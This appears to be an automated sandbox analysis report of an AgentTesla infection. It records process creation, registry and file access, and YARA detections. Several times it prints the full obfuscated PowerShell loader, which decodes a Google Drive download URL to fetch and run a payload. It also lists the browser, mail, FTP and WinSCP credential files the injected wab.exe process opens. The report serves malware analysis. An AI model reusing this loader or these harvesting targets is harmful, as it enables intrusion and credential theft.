Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSamgiaCuck %leaka\Man,mMS peryEstrexHumblopostcgCardia espasUnde,t ForseS iklrPhon .,ngseOKindepCe.trvFolke Hypot&Pseud&Misco Fo,tyeColoucVigtihGstevo Spor alm$Udg.a ';Infatuatedly (Preinterceded 'G.lli$ NavlgYderllGalvaoCaptibomsteaCoryzlEvigt: sansB DiakoStilllProletSkovfa SkrinRise,tllebr=Dis b( Tor,c AtmomManifdGents Formi/.adjacSak.n Saf,$Stat.KFrondnIssensEnl rcSte,ie DronlBe kelAntikeN dkm)In,al ');Infatuatedly (Preinterceded 'Slide$CentrgTraktlN,ncooK,ssabCovenaFork,lSpyds: FretAUn,lefAktiot.mbyga orval.evrdeSaftekKlokkaqu drlDobb.eLed	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Myxogaster.Opv && echo $"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$allentown = 1;$ordknappestes='substrin';$ordknappestes+='g';function preinterceded($veinwise){$regnorms=$veinwise.length-$allentown;for($jargonium=5; $jargonium -lt $regnorms; $jargonium+=(6)){$woodener+=$veinwise.$ordknappestes.invoke($jargonium, $allentown);}$woodener;}function infatuatedly($beneficeforestillingernes191){. ($subcutaneous) ($beneficeforestillingernes191);}$indknebnes=preinterceded 'hyperm trveo givez straivejr.lovervl cyanagarde/ myto5b.lli.skved0musik appro(acerrw,argaithoseneskadd.lyveoun,epwmahogsforsm midtonunpu.tallus rveja1share0tales.ove,f0sp yd;packw has.wuprodidecimnsemis6upda.4vaude;.saru j mcrxtwinn6 hi c4 ph l;,assa fiberalabavopfin:optag1 tele2under1hlqnu. ant.0uni c) sner ,rwing.lapsemonercwightk trano unhe/clime2bibri0westm1folke0taabe0indsk1 phle0derhj1svrme udligftimeli philr sa.debla,sfjuvalovar gx s,oe/uegen1syda.2thurl1under.tra.y0 slet ';$sevenbommens=preinterceded 'indtru.ecansreilae diplrraphi-deltaab,ckbgskak e ,ikrncodswtincom ';$socionoms=preinterceded 'dativhsole tblaa.t.otlypu ions pr i:trima/uninf/peltidbiscarsolsii,ecapvbankaecalpa.,ortagaktieoforkaos.detgrepubludenrefor l.unac,cmash obygnimbyr e/rud,sule escung.r?syncre ko sxsids.p.rempoinputr l,lit isop= sansdensidomindewfilipn ob.llklyngoeddika,rendddoven&naturik,rofdtro t= samf1 unpaycolliethebae ph njpref.v liteot.grygvandrccoequ5 nasittiresnanskufcomplf marmdi,jur9erind1 allo7.ladd6 ejeremissedwater_taa,t0dyspekblazysrapnd8foderycoteh3chaufysynthn nedirdatakmkommew te n ';$anskaffelsessummerne=preinterceded 'rumne>chann ';$subcutaneous=preinterceded 'routeifor,belysstx.akey ';$mesopodiale='krnikens';infatuatedly (preinterceded 'her.us,ndebestatutst ej-geoaech.lakol.llentenodtreakte apo,nsummeter mi adhsi-homelpskyggasimontb,bonh lles formato duc:.ream\stigmdchagordormiystyrtascrufsdi.re. j,llts.warx ngsetinds, su.p-f ekvvascogaultralskoleudag,oe,nsgn vandh$etherme tadeyeomastrillosrettpchiliomora duptubibyt ea.virkl.uinye tros; fin, ');infatuatedly (preinterceded ' ae iigyrinfradze bjden(prevotunrenet.ggespatibtfratr-necrop evenaro.entkabyshom.in bo.tgtsuper:fa,ri\ richd trior,rdskybolsmapes,isarchi.redbrtdefekxstryctskn,e) nte{ costedoradx,oopri i,rat farl}co.se;diakr ');$knscelle = preinterceded '.nvesepragtcsnknihprovioanker vnin%sor,eahovedpc,untpcountdskopua aniktsamgiacuck %leaka\man,mms peryestrexhumblopostcgcardia espasunde,t forses iklrphon .,ngseokindepce.trvfolke hypot&pseud&misco fo,tyecoloucvigtihgstevo spor alm$udg.a ';infatuatedly (preinterceded 'g.lli$ navlgyderllgalvaocaptibomsteacoryzlevigt: sansb diakostilllproletskovfa skrinrise,tllebr=dis b( tor,c atmommanifdgents formi/.adjacsak.n saf,$stat.kfrondnissensenl rcste,ie dronlbe kelantiken dkm)in,al ');infatuatedly (preinterceded 'slide$centrgtraktln,ncook,ssabcovenafork,lspyds: fretaun,lefaktiot.mbyga orval.evrdesaftekklokkaqu drldobb.eled
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$allentown = 1;$ordknappestes='substrin';$ordknappestes+='g';function preinterceded($veinwise){$regnorms=$veinwise.length-$allentown;for($jargonium=5; $jargonium -lt $regnorms; $jargonium+=(6)){$woodener+=$veinwise.$ordknappestes.invoke($jargonium, $allentown);}$woodener;}function infatuatedly($beneficeforestillingernes191){. ($subcutaneous) ($beneficeforestillingernes191);}$indknebnes=preinterceded 'hyperm trveo givez straivejr.lovervl cyanagarde/ myto5b.lli.skved0musik appro(acerrw,argaithoseneskadd.lyveoun,epwmahogsforsm midtonunpu.tallus rveja1share0tales.ove,f0sp yd;packw has.wuprodidecimnsemis6upda.4vaude;.saru j mcrxtwinn6 hi c4 ph l;,assa fiberalabavopfin:optag1 tele2under1hlqnu. ant.0uni c) sner ,rwing.lapsemonercwightk trano unhe/clime2bibri0westm1folke0taabe0indsk1 phle0derhj1svrme udligftimeli philr sa.debla,sfjuvalovar gx s,oe/uegen1syda.2thurl1under.tra.y0 slet ';$sevenbommens=preinterceded 'indtru.ecansreilae diplrraphi-deltaab,ckbgskak e ,ikrncodswtincom ';$socionoms=preinterceded 'dativhsole tblaa.t.otlypu ions pr i:trima/uninf/peltidbiscarsolsii,ecapvbankaecalpa.,ortagaktieoforkaos.detgrepubludenrefor l.unac,cmash obygnimbyr e/rud,sule escung.r?syncre ko sxsids.p.rempoinputr l,lit isop= sansdensidomindewfilipn ob.llklyngoeddika,rendddoven&naturik,rofdtro t= samf1 unpaycolliethebae ph njpref.v liteot.grygvandrccoequ5 nasittiresnanskufcomplf marmdi,jur9erind1 allo7.ladd6 ejeremissedwater_taa,t0dyspekblazysrapnd8foderycoteh3chaufysynthn nedirdatakmkommew te n ';$anskaffelsessummerne=preinterceded 'rumne>chann ';$subcutaneous=preinterceded 'routeifor,belysstx.akey ';$mesopodiale='krnikens';infatuatedly (preinterceded 'her.us,ndebestatutst ej-geoaech.lakol.llentenodtreakte apo,nsummeter mi adhsi-homelpskyggasimontb,bonh lles formato duc:.ream\stigmdchagordormiystyrtascrufsdi.re. j,llts.warx ngsetinds, su.p-f ekvvascogaultralskoleudag,oe,nsgn vandh$etherme tadeyeomastrillosrettpchiliomora duptubibyt ea.virkl.uinye tros; fin, ');infatuatedly (preinterceded ' ae iigyrinfradze bjden(prevotunrenet.ggespatibtfratr-necrop evenaro.entkabyshom.in bo.tgtsuper:fa,ri\ richd trior,rdskybolsmapes,isarchi.redbrtdefekxstryctskn,e) nte{ costedoradx,oopri i,rat farl}co.se;diakr ');$knscelle = preinterceded '.nvesepragtcsnknihprovioanker vnin%sor,eahovedpc,untpcountdskopua aniktsamgiacuck %leaka\man,mms peryestrexhumblopostcgcardia espasunde,t forses iklrphon .,ngseokindepce.trvfolke hypot&pseud&misco fo,tyecoloucvigtihgstevo spor alm$udg.a ';infatuatedly (preinterceded 'g.lli$ navlgyderllgalvaocaptibomsteacoryzlevigt: sansb diakostilllproletskovfa skrinrise,tllebr=dis b( tor,c atmommanifdgents formi/.adjacsak.n saf,$stat.kfrondnissensenl rcste,ie dronlbe kelantiken dkm)in,al ');infatuatedly (preinterceded 'slide$centrgtraktln,ncook,ssabcovenafork,lspyds: fretaun,lefaktiot.mbyga orval.evrdesaftekklokkaqu drldobb.eled
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$allentown = 1;$ordknappestes='substrin';$ordknappestes+='g';function preinterceded($veinwise){$regnorms=$veinwise.length-$allentown;for($jargonium=5; $jargonium -lt $regnorms; $jargonium+=(6)){$woodener+=$veinwise.$ordknappestes.invoke($jargonium, $allentown);}$woodener;}function infatuatedly($beneficeforestillingernes191){. ($subcutaneous) ($beneficeforestillingernes191);}$indknebnes=preinterceded 'hyperm trveo givez straivejr.lovervl cyanagarde/ myto5b.lli.skved0musik appro(acerrw,argaithoseneskadd.lyveoun,epwmahogsforsm midtonunpu.tallus rveja1share0tales.ove,f0sp yd;packw has.wuprodidecimnsemis6upda.4vaude;.saru j mcrxtwinn6 hi c4 ph l;,assa fiberalabavopfin:optag1 tele2under1hlqnu. ant.0uni c) sner ,rwing.lapsemonercwightk trano unhe/clime2bibri0westm1folke0taabe0indsk1 phle0derhj1svrme udligftimeli philr sa.debla,sfjuvalovar gx s,oe/uegen1syda.2thurl1under.tra.y0 slet ';$sevenbommens=preinterceded 'indtru.ecansreilae diplrraphi-deltaab,ckbgskak e ,ikrncodswtincom ';$socionoms=preinterceded 'dativhsole tblaa.t.otlypu ions pr i:trima/uninf/peltidbiscarsolsii,ecapvbankaecalpa.,ortagaktieoforkaos.detgrepubludenrefor l.unac,cmash obygnimbyr e/rud,sule escung.r?syncre ko sxsids.p.rempoinputr l,lit isop= sansdensidomindewfilipn ob.llklyngoeddika,rendddoven&naturik,rofdtro t= samf1 unpaycolliethebae ph njpref.v liteot.grygvandrccoequ5 nasittiresnanskufcomplf marmdi,jur9erind1 allo7.ladd6 ejeremissedwater_taa,t0dyspekblazysrapnd8foderycoteh3chaufysynthn nedirdatakmkommew te n ';$anskaffelsessummerne=preinterceded 'rumne>chann ';$subcutaneous=preinterceded 'routeifor,belysstx.akey ';$mesopodiale='krnikens';infatuatedly (preinterceded 'her.us,ndebestatutst ej-geoaech.lakol.llentenodtreakte apo,nsummeter mi adhsi-homelpskyggasimontb,bonh lles formato duc:.ream\stigmdchagordormiystyrtascrufsdi.re. j,llts.warx ngsetinds, su.p-f ekvvascogaultralskoleudag,oe,nsgn vandh$etherme tadeyeomastrillosrettpchiliomora duptubibyt ea.virkl.uinye tros; fin, ');infatuatedly (preinterceded ' ae iigyrinfradze bjden(prevotunrenet.ggespatibtfratr-necrop evenaro.entkabyshom.in bo.tgtsuper:fa,ri\ richd trior,rdskybolsmapes,isarchi.redbrtdefekxstryctskn,e) nte{ costedoradx,oopri i,rat farl}co.se;diakr ');$knscelle = preinterceded '.nvesepragtcsnknihprovioanker vnin%sor,eahovedpc,untpcountdskopua aniktsamgiacuck %leaka\man,mms peryestrexhumblopostcgcardia espasunde,t forses iklrphon .,ngseokindepce.trvfolke hypot&pseud&misco fo,tyecoloucvigtihgstevo spor alm$udg.a ';infatuatedly (preinterceded 'g.lli$ navlgyderllgalvaocaptibomsteacoryzlevigt: sansb diakostilllproletskovfa skrinrise,tllebr=dis b( tor,c atmommanifdgents formi/.adjacsak.n saf,$stat.kfrondnissensenl rcste,ie dronlbe kelantiken dkm)in,al ');infatuatedly (preinterceded 'slide$centrgtraktln,ncook,ssabcovenafork,lspyds: fretaun,lefaktiot.mbyga orval.evrdesaftekklokkaqu drldobb.eled	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$allentown = 1;$ordknappestes='substrin';$ordknappestes+='g';function preinterceded($veinwise){$regnorms=$veinwise.length-$allentown;for($jargonium=5; $jargonium -lt $regnorms; $jargonium+=(6)){$woodener+=$veinwise.$ordknappestes.invoke($jargonium, $allentown);}$woodener;}function infatuatedly($beneficeforestillingernes191){. ($subcutaneous) ($beneficeforestillingernes191);}$indknebnes=preinterceded 'hyperm trveo givez straivejr.lovervl cyanagarde/ myto5b.lli.skved0musik appro(acerrw,argaithoseneskadd.lyveoun,epwmahogsforsm midtonunpu.tallus rveja1share0tales.ove,f0sp yd;packw has.wuprodidecimnsemis6upda.4vaude;.saru j mcrxtwinn6 hi c4 ph l;,assa fiberalabavopfin:optag1 tele2under1hlqnu. ant.0uni c) sner ,rwing.lapsemonercwightk trano unhe/clime2bibri0westm1folke0taabe0indsk1 phle0derhj1svrme udligftimeli philr sa.debla,sfjuvalovar gx s,oe/uegen1syda.2thurl1under.tra.y0 slet ';$sevenbommens=preinterceded 'indtru.ecansreilae diplrraphi-deltaab,ckbgskak e ,ikrncodswtincom ';$socionoms=preinterceded 'dativhsole tblaa.t.otlypu ions pr i:trima/uninf/peltidbiscarsolsii,ecapvbankaecalpa.,ortagaktieoforkaos.detgrepubludenrefor l.unac,cmash obygnimbyr e/rud,sule escung.r?syncre ko sxsids.p.rempoinputr l,lit isop= sansdensidomindewfilipn ob.llklyngoeddika,rendddoven&naturik,rofdtro t= samf1 unpaycolliethebae ph njpref.v liteot.grygvandrccoequ5 nasittiresnanskufcomplf marmdi,jur9erind1 allo7.ladd6 ejeremissedwater_taa,t0dyspekblazysrapnd8foderycoteh3chaufysynthn nedirdatakmkommew te n ';$anskaffelsessummerne=preinterceded 'rumne>chann ';$subcutaneous=preinterceded 'routeifor,belysstx.akey ';$mesopodiale='krnikens';infatuatedly (preinterceded 'her.us,ndebestatutst ej-geoaech.lakol.llentenodtreakte apo,nsummeter mi adhsi-homelpskyggasimontb,bonh lles formato duc:.ream\stigmdchagordormiystyrtascrufsdi.re. j,llts.warx ngsetinds, su.p-f ekvvascogaultralskoleudag,oe,nsgn vandh$etherme tadeyeomastrillosrettpchiliomora duptubibyt ea.virkl.uinye tros; fin, ');infatuatedly (preinterceded ' ae iigyrinfradze bjden(prevotunrenet.ggespatibtfratr-necrop evenaro.entkabyshom.in bo.tgtsuper:fa,ri\ richd trior,rdskybolsmapes,isarchi.redbrtdefekxstryctskn,e) nte{ costedoradx,oopri i,rat farl}co.se;diakr ');$knscelle = preinterceded '.nvesepragtcsnknihprovioanker vnin%sor,eahovedpc,untpcountdskopua aniktsamgiacuck %leaka\man,mms peryestrexhumblopostcgcardia espasunde,t forses iklrphon .,ngseokindepce.trvfolke hypot&pseud&misco fo,tyecoloucvigtihgstevo spor alm$udg.a ';infatuatedly (preinterceded 'g.lli$ navlgyderllgalvaocaptibomsteacoryzlevigt: sansb diakostilllproletskovfa skrinrise,tllebr=dis b( tor,c atmommanifdgents formi/.adjacsak.n saf,$stat.kfrondnissensenl rcste,ie dronlbe kelantiken dkm)in,al ');infatuatedly (preinterceded 'slide$centrgtraktln,ncook,ssabcovenafork,lspyds: fretaun,lefaktiot.mbyga orval.evrdesaftekklokkaqu drldobb.eled	Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 00000008.00000002.3296966087.0000000023987000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3296966087.0000000023961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wab.exe PID: 320, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Program Files (x86)\Windows Mail\wab.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Yara detected Credential Stealer

Source: Yara match

File source: 00000008.00000002.3296966087.0000000023961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 00000008.00000002.3296966087.0000000023987000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
